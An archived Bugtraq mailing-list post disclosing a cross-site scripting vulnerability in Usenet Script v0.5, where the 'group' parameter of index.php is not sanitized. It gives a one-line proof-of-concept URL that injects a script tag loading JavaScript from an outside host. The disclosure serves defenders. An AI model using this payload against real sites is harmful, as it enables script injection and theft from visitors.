Bugtraq mailing list archives
Usenet Script v0.5
From: luny () youfucktard com
Date: 25 Jun 2006 17:18:22 -0000
Usenet Script v0.5 Homepage: http://www.metalhead.ws/usenet Description: "Those scripts allow you to mirror a Newsgroup in an SQL database. The development database was Postgresql, but it uses dbx and should therefore be able to work with other database systems, too. Furthermore, a frontend is provided." Affected files: index.php ------------------------------------ XSS vuln via index.php on group var: Data isnt properly sanatized before being generated. http://www.example.com/index.php?group=<script src=http://www.youfucktard.com/xss.js></script>
Current thread:
- Usenet Script v0.5 luny (Jun 27)